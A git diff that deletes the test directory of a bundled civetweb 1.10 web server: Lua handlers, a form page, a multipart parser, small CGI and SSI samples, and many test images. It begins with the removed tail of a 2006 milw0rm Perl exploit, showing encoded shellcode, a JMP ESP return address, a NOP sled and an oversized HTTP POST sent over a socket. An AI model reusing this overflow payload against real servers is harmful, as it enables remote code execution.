-"%53%08%c0%14%69%9e%0f%e4%27%2f%a0%bf%76%cb%c0%86".
-"%d9%c6%60%6b%0d%d6%2a%0b%d9%d6%a0%e1%b9%43%77%c4".
-"%56%09%1a%20%36%41%6b%d0%d7%0a%53%ec%d9%8a%27%6b".
-"%22%d6%86%6b%3a%c2%c0%e9%d9%4a%9b%e0%52%ca%a0%88".
-"%0d%a2%b3%1e%d8%c4%7c%1f%b5%a9%4a%8c%31%ca%2b%e0";
-
-
-$esp="%73%C3%2A%4F";                 #[4F2AC373]JMP ESP (kernel32.dll) WinXP SP1(Hebrew)
-$buff=("%41"x8).$esp.("%90"x85).$shell;        #Shellcode+NOP=245
-
-print length($buff) . "\n";
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || &fail();
-    syswrite STDOUT,"[+]Connected.\n";
-    print $sock "POST /$buff HTTP/1.1\n";
-    print $sock "HOST:$host\n\n";
-    syswrite STDOUT,"[+]Done.\n";
-close($sock);
-
-# milw0rm.com [2006-10-05]
diff --git a/thirdparty/civetweb-1.10/test/filehandler.lua b/thirdparty/civetweb-1.10/test/filehandler.lua
deleted file mode 100644
index 57bf411..0000000
--- a/thirdparty/civetweb-1.10/test/filehandler.lua
+++ /dev/null
@@ -1,93 +0,0 @@
-function send_ok()

-	mg.write("HTTP/1.0 200 OK\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-end

-

-

-function send_not_found()

-	mg.write("HTTP/1.0 404 Not Found\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-end

-

-

-handler = "filehandler.lua"

-sub_uri = mg.request_info.uri:sub(#handler+2)

-filename = "D:\\civetweb\\civetweb" .. sub_uri

-attr = lfs.attributes(filename)

-

---[[

-if not attr then

-	send_not_found()

-	mg.write("\r\n")

-	mg.write("File " .. sub_uri .. " not available")

-	return

-end

-]]

-

-if mg.request_info.request_method == "GET" then

-	-- send_file will handle 404 internally

-	mg.send_file(filename)

-	return

-

-elseif mg.request_info.request_method == "HEAD" then

-	-- send_file can handle "GET" and "HEAD"

-	mg.send_file(filename)

-	return

-

-elseif mg.request_info.request_method == "PUT" then

-	local f = io.open(filename, "w")

-	if (not f) then

-		mg.write("HTTP/1.0 500 Internal Server Error\r\n")

-		mg.write("Connection: close\r\n")

-		mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-		mg.write("\r\n")

-		return

-	end

-

-	mg.write("HTTP/1.0 201 Created\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-	mg.write("\r\n")

-	repeat

-		local buf = mg.read();

-		if (buf) then

-			f:write(buf)

-		end

-	until (not buf);

-	f:close()

-

-	mg.write("HTTP/1.0 201 Created\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-	mg.write("\r\n")

-	return

-

-elseif mg.request_info.request_method == "DELETE" then

-	if not attr then

-		send_not_found()

-		mg.write("\r\n")

-		mg.write("File " .. sub_uri .. " not available")

-		return

-	end

-	os.remove(filename)

-	mg.write("HTTP/1.0 204 No Content\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-	mg.write("\r\n")

-	return

-

-elseif mg.request_info.request_method == "OPTIONS" then

-	send_ok()

-	mg.write("Allow: GET, HEAD, PUT, DELETE, OPTIONS\r\n")

-	mg.write("\r\n")

-	return

-

-else

-	mg.write("HTTP/1.0 405 Method Not Allowed\r\n")

-	mg.write("Connection: close\r\n")

-	mg.write("Date: " .. os.date("%a, %d %b %Y %H:%M:%S GMT") .. "\r\n")

-	mg.write("\r\n")

-	return

-end

diff --git a/thirdparty/civetweb-1.10/test/form.html b/thirdparty/civetweb-1.10/test/form.html
deleted file mode 100644
index 381084c..0000000
--- a/thirdparty/civetweb-1.10/test/form.html
+++ /dev/null
@@ -1,118 +0,0 @@
-<!DOCTYPE HTML>

-<html>

-

-<head>

-  <meta charset="UTF-8">

-  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

-  <title>Example page for HTML form handling</title>

-</head>

-

-<body>

-

-  <!-- HTML forms can use GET or POST, and the encoding can be application/x-www-form-urlencoded or multipart/form-data.

-       If no method is specified (like <form method="method">), GET should be the default method.

-       If no encoding is specified, application/x-www-form-urlencoded should be the default.

-       Submit buttons may overwrite action, method and enctype by using formaction, formmethod and formenctype.

-

-       References:

-       http://www.w3.org/TR/html401/interact/forms.html

-       http://www.w3schools.com/html/html_forms.asp,

-       http://www.w3schools.com/html/html_form_attributes.asp

-       http://www.w3.org/TR/html401/interact/forms.html#adef-enctype

-  -->

-

-

-  <form action="/handle_form.embedded_c.example.callback">

-    See <a href="http://www.w3schools.com/html/html_form_input_types.asp">HTML form tutorial</a>

-    and <a href="http://www.w3.org/TR/html401/interact/forms.html">HTML spec</a>.<br />

-

-    <fieldset>

-      <legend>Text inputs:</legend>

-      A text: <input type="text" name="textin"><br />

-      A password: <input type="password" name="passwordin"><br />

-    </fieldset>

-

-    <fieldset>

-      <legend>Radio set 1:</legend>

-      <input type="radio" name="radio1" value="val1" checked>val1<br />

-      <input type="radio" name="radio1" value="val2">val2<br />

-      <input type="radio" name="radio1" value="val3">val3<br />

-    </fieldset>

-

-    <fieldset>

-      <legend>Radio set 2:</legend>

-      <input type="radio" name="radio2" value="val1" checked>val1<br />

-      <input type="radio" name="radio2" value="val2">val2<br />

-      <input type="radio" name="radio2" value="val3">val3<br />

-    </fieldset>

-

-    <fieldset>

-      <legend>Checkboxes:</legend>

-      <input type="checkbox" name="check1" value="val1" checked>val1<br />

-      <input type="checkbox" name="check2" value="val2">val2<br />

-      <input type="checkbox" name="check3" value="val3">val3<br />

-    </fieldset>

-

-    <fieldset>

-      <legend>HTML5 inputs:</legend>

-      A number: <input type="number" name="numberin" min="1" max="5"><br />

-      A date: <input type="date" name="datein"><br />

-      A color: <input type="color" name="colorin"><br />

-      A range: <input type="range" name="rangein" min="1" max="5"><br />

-      A month: <input type="month" name="monthin"><br />

-      A week: <input type="week" name="weekin"><br />

-      A time: <input type="time" name="timein"><br />

-      A datetime: <input type="datetime" name="datetimen"><br />

-      A datetime-local: <input type="datetime-local" name="datetimelocalin"><br />

-      An email: <input type="email" name="emailin"><br />

-      A search: <input type="search" name="searchin"><br />

-      A tel: <input type="tel" name="telin"><br />

-      An url: <input type="url" name="urlin"><br />

-    </fieldset>

-

-    <fieldset>

-      <legend>Files:</legend>

-      A file: <input type="file" name="filein"><br />

-      Multiple files: <input type="file" name="filesin" multiple><br>

-    </fieldset>

-

-    <fieldset>

-      <legend>Dropdown:</legend>

-      <select name="selectin">

-        <option value="opt1">opt1</option>

-        <option value="opt2">opt2</option>

-        <option value="opt3">opt3</option>

-      </select>

-    </fieldset>

-

-    <fieldset>

-      <legend>Text area:</legend>

-      <textarea name="message" rows="10" cols="30">Text area default text.</textarea>

-    </fieldset>

-

-    <fieldset>

-    <legend>Submit:</legend>

-      <fieldset>

-        <legend>Submit to Lua script:</legend>

-        This will only work if server side Lua scripting is activated and /handle_form.lua can be found on the server.

-        <br>

-        <input type="submit" value="Submit"  formmethod="POST"  formenctype="multipart/form-data"

-         formaction="/handle_form.lua">

-      </fieldset>

-

-      <fieldset>

-        <legend>Submit to callback:</legend>

-        This will work in the embedded_c example. It will call mg_handle_form_data to parse the request.

-        <br>

-        <input type="submit" value="Submit (form default)">

-        <input type="submit" value="Submit (GET)"                 formmethod="GET">

-        <input type="submit" value="Submit (POST)"                formmethod="POST">

-        <input type="submit" value="Submit (POST, url-encoded)"   formmethod="POST"   formenctype="application/x-www-form-urlencoded">

-        <input type="submit" value="Submit (POST, form-data)"     formmethod="POST"   formenctype="multipart/form-data">

-      </fieldset>

-    </fieldset>

-

-  </form>

-</body>

-

-</html>

diff --git a/thirdparty/civetweb-1.10/test/handle_form.lua b/thirdparty/civetweb-1.10/test/handle_form.lua
deleted file mode 100644
index c3694ae..0000000
--- a/thirdparty/civetweb-1.10/test/handle_form.lua
+++ /dev/null
@@ -1,123 +0,0 @@
--- Some basic checks

-if mg.request_info.request_method ~= "POST" or mg.request_info.content_type:lower():sub(1,19) ~= 'multipart/form-data' then

-  mg.write("HTTP/1.0 400 OK\r\n")

-  mg.write("Connection: close\r\n")

-  mg.write("Content-Type: text/plain; charset=utf-8\r\n")

-  mg.write("Cache-Control: max-age=0, must-revalidate\r\n")

-  mg.write("\r\n")

-  mg.write("Bad request\r\n\r\n")

-  return

-end

-

--- HTTP headers

-mg.write("HTTP/1.0 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/plain; charset=utf-8\r\n")

-mg.write("Cache-Control: max-age=0, must-revalidate\r\n")

-mg.write("\r\n")

-

--- Which form sent the data?

-mg.write("Read POST data from " .. mg.request_info.http_headers.Referer .. ":\r\n\r\n")

-

--- Count some data fields

-local fields = 0

-local datasize = 0

-

--- Read the entire body data (POST content) into "bdata" variable.

--- Use a string builder pattern for performance reasons

-stringtab = {}

-bdata = ""

-repeat

-  local add_data = mg.read()

-  if add_data then

-    stringtab[#stringtab+1] = add_data

-  end

-until (add_data == nil);

-bdata = table.concat(stringtab)

-stringtab = nil

-

--- Get the boundary string.

-bs = "--" .. ((mg.request_info.content_type):upper():match("BOUNDARY=(.*)"));

-

--- The POST data has to start with the boundary string.

--- Check this and remove the starting boundary.

-if bdata:sub(1, #bs) ~= bs then

-  error "invalid format of POST data"

-end

-bdata = bdata:sub(#bs)

-

--- The boundary now starts with CR LF.

-bs = "\r\n" .. bs

-

--- Now loop through all the parts

-while #bdata>4 do

-   -- Find the header of new part.

-   part_header_end = bdata:find("\r\n\r\n", 1, true)

-

-   -- Parse the header.

-   local form_field_name, file_name

-   h = bdata:sub(1, part_header_end+2)

-   for key,val in h:gmatch("([^%:\r\n]*)%s*%:%s*([^\r\n]*)\r\n") do

-      if key:upper() == "CONTENT-DISPOSITION" then

-          form_field_name = val:match('name=%"([^%"]*)%"')

-          file_name = val:match('filename=%"([^%"]*)%"')

-      end

-   end

-

-   -- Remove the header from "bdata".

-   bdata = bdata:sub(part_header_end+4)

-

-   -- Find the end of the body by locating the boundary string.

-   local part_body_end = bdata:find(bs, 1, true)

-

-   -- Isolate the content, and drop it from "bdata".

-   local form_field_value = bdata:sub(1,part_body_end-1)

-   bdata = bdata:sub(part_body_end+#bs)

-

-   -- Now the data (file content or field value) is isolated: We know form_field_name and form_field_value.

-   -- Here the script should do something useful with the data. This example just sends it back to the client.

-   if form_field_name then

-     mg.write("Field name: " .. form_field_name .. "\r\n")

-   end

-

-   local len = #form_field_value

-   mg.write("Field data length: " .. len .. "\r\n")

-

-   if file_name then

-     mg.write("File name: " .. file_name .. "\r\n")

-     mg.write("File content:\r\n")

-     local maxlen

-     if len>320 then maxlen=320 else maxlen=len end

-

-     for l=0,maxlen,16 do

-       for m=1,16 do

-         local b = form_field_value:byte(l+m)

-         if (b) then

-           mg.write(string.format("%02x ", b))

-         else

-           mg.write("   ")

-         end

-       end

-       mg.write(" -  " .. form_field_value:sub(l+1,l+16):gsub("[%c%z%s]", " ") .. "\r\n")

-     end

-     if maxlen<len then

-       mg.write(string.format("... (+ %u bytes)\r\n", len-maxlen))

-     end

-

-   else

-     -- not a file

-     if len<50 then

-       mg.write("Field value: " .. form_field_value .. "\r\n")

-     else

-       mg.write("Field value: " .. form_field_value:sub(1, 40) .. " .. (" .. len .. " bytes)\r\n")

-     end

-   end

-

-

-   mg.write("\r\n")

-   fields = fields + 1

-   datasize = datasize + len

-

-end

-

-mg.write("Got " .. fields .. " input fields with " .. datasize .. " bytes total\r\n");

diff --git a/thirdparty/civetweb-1.10/test/hello.cgi b/thirdparty/civetweb-1.10/test/hello.cgi
deleted file mode 100755
index cc96814..0000000
--- a/thirdparty/civetweb-1.10/test/hello.cgi
+++ /dev/null
@@ -1,7 +0,0 @@
-#!/bin/sh
-
-echo "Content-Type: text/plain"
-echo
-
-echo "Query string:"
-echo $QUERY_STRING
diff --git a/thirdparty/civetweb-1.10/test/hello.shtml b/thirdparty/civetweb-1.10/test/hello.shtml
deleted file mode 100644
index d4094cc..0000000
--- a/thirdparty/civetweb-1.10/test/hello.shtml
+++ /dev/null
@@ -1,5 +0,0 @@
-<pre>
-hello.shtml: include "hello.txt":
-<!--#include file="hello.txt" -->
-hello.shtml: end
-</pre>
diff --git a/thirdparty/civetweb-1.10/test/hello.txt b/thirdparty/civetweb-1.10/test/hello.txt
deleted file mode 100644
index 7feddbf..0000000
--- a/thirdparty/civetweb-1.10/test/hello.txt
+++ /dev/null
@@ -1 +0,0 @@
-simple text file
diff --git a/thirdparty/civetweb-1.10/test/hello_gz.txt.gz b/thirdparty/civetweb-1.10/test/hello_gz.txt.gz
deleted file mode 100644
index 7325429..0000000
--- a/thirdparty/civetweb-1.10/test/hello_gz.txt.gz
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/hello_gz_unzipped.txt b/thirdparty/civetweb-1.10/test/hello_gz_unzipped.txt
deleted file mode 100644
index bde6e8a..0000000
--- a/thirdparty/civetweb-1.10/test/hello_gz_unzipped.txt
+++ /dev/null
@@ -1 +0,0 @@
-hello from a zipped text file
diff --git a/thirdparty/civetweb-1.10/test/html_esc.lua b/thirdparty/civetweb-1.10/test/html_esc.lua
deleted file mode 100644
index addfe76..0000000
--- a/thirdparty/civetweb-1.10/test/html_esc.lua
+++ /dev/null
@@ -1,60 +0,0 @@
-htmlEscape = {    "&#x263a;", "&#x263b;", "&#x2665;", "&#x2666;", "&#x2663;", "&#x2660;", "&#x2022;", -- ASCII 1-7 (symbols for control characters, see code page 437)

-      "&#x25d8;", "&#x25cb;", "&#x25d9;", "&#x2642;", "&#x2640;", "&#x266a;", "&#x266b;", "&#x263c;", -- ASCII 8-15

-      "&#x25ba;", "&#x25c4;", "&#x2195;", "&#x203c;", "&#x00b6;", "&#x00a7;", "&#x25ac;", "&#x21a8;", -- ASCII 16-23

-      "&#x2191;", "&#x2193;", "&#x21a8;", "&#x2190;", "&#x221f;", "&#x2192;", "&#x25b2;", "&#x25bc;", -- ASCII 24-31

-      " ",        "!",        "&quot;",   "#",        "$",        "%",        "&amp;",    "'",        -- ASCII 32-39

-      "(",        ")",        "*",        "+",        ",",        "-",        ".",        "/",        -- ASCII 40-47

-      "0",        "1",        "2",        "3",        "4",        "5",        "6",        "7",        -- ASCII 48-55

-      "8",        "9",        ":",        ";",        "&lt;",     "=",        "&gt;",     "?",        -- ASCII 56-63

-      "@",        "A",        "B",        "C",        "D",        "E",        "F",        "G",        -- ASCII 64-71

-      "H",        "I",        "J",        "K",        "L",        "M",        "N",        "O",        -- ASCII 72-79

-      "P",        "Q",        "R",        "S",        "T",        "U",        "V",        "W",        -- ASCII 80-87

-      "X",        "Y",        "Z",        "[",        "\\",       "]",        "^",        "_",        -- ASCII 88-95

-      "`",        "a",        "b",        "c",        "d",        "e",        "f",        "g",        -- ASCII 96-103

-      "h",        "i",        "j",        "k",        "l",        "m",        "n",        "o",        -- ASCII 104-111

-      "p",        "q",        "r",        "s",        "t",        "u",        "v",        "w",        -- ASCII 112-119

-      "x",        "y",        "z",        "{",        "|",        "}",        "~",        "&#x2302;", -- ASCII 120-127

-      "&Ccedil;", "&uuml;",   "&eacute;", "&acirc;",  "&auml;",   "&agrave;", "&aring;",  "&ccedil;", -- 128-135 (dos code page 850)

-      "&ecirc;",  "&euml;",   "&egrave;", "&iuml;",   "&icirc;",  "&igrave;", "&Auml;",   "&Aring;",  -- 136-143

-      "&Eacute;", "&aelig;",  "&AElig;",  "&ocirc;",  "&ouml;",   "&ograve;", "&ucirc;",  "&ugrave;", -- 144-151

-      "&yuml;",   "&Ouml;",   "&Uuml;",   "&oslash;", "&#x00a3;", "&Oslash;", "&#x00d7;", "&#x0192;", -- 152-159

-      "&aacute;", "&iacute;", "&oacute;", "&uacute;", "&ntilde;", "&Ntilde;", "&#x00aa;", "&#x00ba;", -- 160-167

-      "&#x00bf;", "&#x00ae;", "&#x00ac;", "&#x00bd;", "&#x00bc;", "&#x00a1;", "&#x00ab;", "&#x00bb;", -- 168-175

-      "&#x2591;", "&#x2592;", "&#x2593;", "&#x2502;", "&#x2524;", "&Aacute;", "&Acirc;",  "&Agrave;", -- 176-183

-      "&#x00a9;", "&#x2563;", "&#x2551;", "&#x2557;", "&#x255d;", "&cent;",   "&#x00a5;", "&#x2510;", -- 184-191

-      "&#x2514;", "&#x2534;", "&#x252c;", "&#x251c;", "&#x2500;", "&#x253c;", "&atilde;", "&Atilde;", -- 192-199

-      "&#x255a;", "&#x2554;", "&#x2569;", "&#x2566;", "&#x2560;", "&#x2550;", "&#x256c;", "&#x00a4;", -- 200-207

-      "&eth;",    "&ETH;",    "&Ecirc;",  "&Euml;",   "&Egrave;", "&#x0131;", "&Iacute;", "&Icirc;",  -- 208-215

-      "&Iuml;",   "&#x2518;", "&#x250c;", "&#x2588;", "&#x2584;", "&#x00a6;", "&Igrave;", "&#x2580;", -- 216-223

-      "&Oacute;", "&szlig;",  "&Ocirc;",  "&Ograve;", "&otilde;", "&Otilde;", "&#x00b5;", "&thorn;",  -- 224-231

-      "&THORN;",  "&Uacute;", "&Ucirc;",  "&Ugrave;", "&yacute;", "&Yacute;", "&#x00af;", "&#x00b4;", -- 232-239

-      "&equiv;",  "&#x00b1;", "&#x2017;", "&#x00be;", "&#x00b6;", "&#x00a7;", "&#x00f7;", "&#x00b8;", -- 240-247

-      "&#x00b0;", "&#x00a8;", "&#x00b7;", "&#x00b9;", "&#x00b3;", "&#x00b2;", "&#x25a0;", "&#9633;",  -- 248-255 (use empty box for 255)

-};

-htmlEscape[0] = "&middot;" -- in this table, we use a 8 bit character set, where every has a different graphical representation

-

--- the conversion table should work as a convertion function for strings as well

-setmetatable(htmlEscape, {__call = function (tab,str) return string.gsub(str, ".", function (c) return tab[c:byte()] end) end})

-

-

-function htmlEsc(txt)

-    s = txt:gsub("%&", "&amp;")

-    s = s:gsub("%<", "&lt;")

-    return s:gsub("%>", "&gt;")

-end

-

-

-function iso8859_1_to_utf8(txt)

-    local s = txt:gsub(".",

-      function (c)

-        local b = c:byte()

-        if b < 128 then

-          return c

-        elseif b < 192 then

-          return string.char(194, b)

-        else

-          return string.char(195, b-64)

-        end

-      end)

-    return s

-end

diff --git a/thirdparty/civetweb-1.10/test/imagetest/00.png b/thirdparty/civetweb-1.10/test/imagetest/00.png
deleted file mode 100644
index 36160d9..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/00.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/01.png b/thirdparty/civetweb-1.10/test/imagetest/01.png
deleted file mode 100644
index 725bf68..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/01.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/02.png b/thirdparty/civetweb-1.10/test/imagetest/02.png
deleted file mode 100644
index 5b5edf3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/02.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/03.png b/thirdparty/civetweb-1.10/test/imagetest/03.png
deleted file mode 100644
index 8b7d772..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/03.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/04.png b/thirdparty/civetweb-1.10/test/imagetest/04.png
deleted file mode 100644
index dc64871..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/04.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/05.png b/thirdparty/civetweb-1.10/test/imagetest/05.png
deleted file mode 100644
index 5cea521..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/05.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/06.png b/thirdparty/civetweb-1.10/test/imagetest/06.png
deleted file mode 100644
index cb10122..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/06.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/07.png b/thirdparty/civetweb-1.10/test/imagetest/07.png
deleted file mode 100644
index 70134c5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/07.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/08.png b/thirdparty/civetweb-1.10/test/imagetest/08.png
deleted file mode 100644
index ee7c3d8..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/08.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/09.png b/thirdparty/civetweb-1.10/test/imagetest/09.png
deleted file mode 100644
index 6373472..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/09.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/10.png b/thirdparty/civetweb-1.10/test/imagetest/10.png
deleted file mode 100644
index 3823e3a..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/10.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/11.png b/thirdparty/civetweb-1.10/test/imagetest/11.png
deleted file mode 100644
index fa3f411..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/11.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/12.png b/thirdparty/civetweb-1.10/test/imagetest/12.png
deleted file mode 100644
index eec6ee1..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/12.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/13.png b/thirdparty/civetweb-1.10/test/imagetest/13.png
deleted file mode 100644
index 2dcebc5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/13.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/14.png b/thirdparty/civetweb-1.10/test/imagetest/14.png
deleted file mode 100644
index 2a08667..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/14.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/15.png b/thirdparty/civetweb-1.10/test/imagetest/15.png
deleted file mode 100644
index 6d57b59..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/15.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/16.png b/thirdparty/civetweb-1.10/test/imagetest/16.png
deleted file mode 100644
index e4611a3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/16.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/17.png b/thirdparty/civetweb-1.10/test/imagetest/17.png
deleted file mode 100644
index 1975b73..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/17.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/18.png b/thirdparty/civetweb-1.10/test/imagetest/18.png
deleted file mode 100644
index 7090c12..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/18.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/19.png b/thirdparty/civetweb-1.10/test/imagetest/19.png
deleted file mode 100644
index 236f3c3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/19.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/20.png b/thirdparty/civetweb-1.10/test/imagetest/20.png
deleted file mode 100644
index 1c7e5a3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/20.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/21.png b/thirdparty/civetweb-1.10/test/imagetest/21.png
deleted file mode 100644
index e8d9344..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/21.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/22.png b/thirdparty/civetweb-1.10/test/imagetest/22.png
deleted file mode 100644
index fd8d4aa..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/22.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/23.png b/thirdparty/civetweb-1.10/test/imagetest/23.png
deleted file mode 100644
index 3772ec5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/23.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/24.png b/thirdparty/civetweb-1.10/test/imagetest/24.png
deleted file mode 100644
index 2b458f9..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/24.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/25.png b/thirdparty/civetweb-1.10/test/imagetest/25.png
deleted file mode 100644
index 53d4757..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/25.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/26.png b/thirdparty/civetweb-1.10/test/imagetest/26.png
deleted file mode 100644
index d4a101c..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/26.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/27.png b/thirdparty/civetweb-1.10/test/imagetest/27.png
deleted file mode 100644
index a40fc51..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/27.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/28.png b/thirdparty/civetweb-1.10/test/imagetest/28.png
deleted file mode 100644
index 12d72a6..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/28.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/29.png b/thirdparty/civetweb-1.10/test/imagetest/29.png
deleted file mode 100644
index 0638d45..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/29.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/30.png b/thirdparty/civetweb-1.10/test/imagetest/30.png
deleted file mode 100644
index 2446c60..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/30.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/31.png b/thirdparty/civetweb-1.10/test/imagetest/31.png
deleted file mode 100644
index bbcbf51..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/31.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/32.png b/thirdparty/civetweb-1.10/test/imagetest/32.png
deleted file mode 100644
index b40f395..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/32.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/33.png b/thirdparty/civetweb-1.10/test/imagetest/33.png
deleted file mode 100644
index 7293ea5..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/33.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/34.png b/thirdparty/civetweb-1.10/test/imagetest/34.png
deleted file mode 100644
index fb3de9c..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/34.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/35.png b/thirdparty/civetweb-1.10/test/imagetest/35.png
deleted file mode 100644
index 4635bb0..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/35.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/36.png b/thirdparty/civetweb-1.10/test/imagetest/36.png
deleted file mode 100644
index 1a300ef..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/36.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/37.png b/thirdparty/civetweb-1.10/test/imagetest/37.png
deleted file mode 100644
index 6f44faf..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/37.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/38.png b/thirdparty/civetweb-1.10/test/imagetest/38.png
deleted file mode 100644
index 1f0b810..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/38.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/39.png b/thirdparty/civetweb-1.10/test/imagetest/39.png
deleted file mode 100644
index 02cee96..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/39.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/40.png b/thirdparty/civetweb-1.10/test/imagetest/40.png
deleted file mode 100644
index 5dd1fd4..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/40.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/41.png b/thirdparty/civetweb-1.10/test/imagetest/41.png
deleted file mode 100644
index 734b9d3..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/41.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/42.png b/thirdparty/civetweb-1.10/test/imagetest/42.png
deleted file mode 100644
index c19bc8f..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/42.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/test/imagetest/43.png b/thirdparty/civetweb-1.10/test/imagetest/43.png
deleted file mode 100644
index 0d58081..0000000
--- a/thirdparty/civetweb-1.10/test/imagetest/43.png
+++ /dev/null
Binary files differ
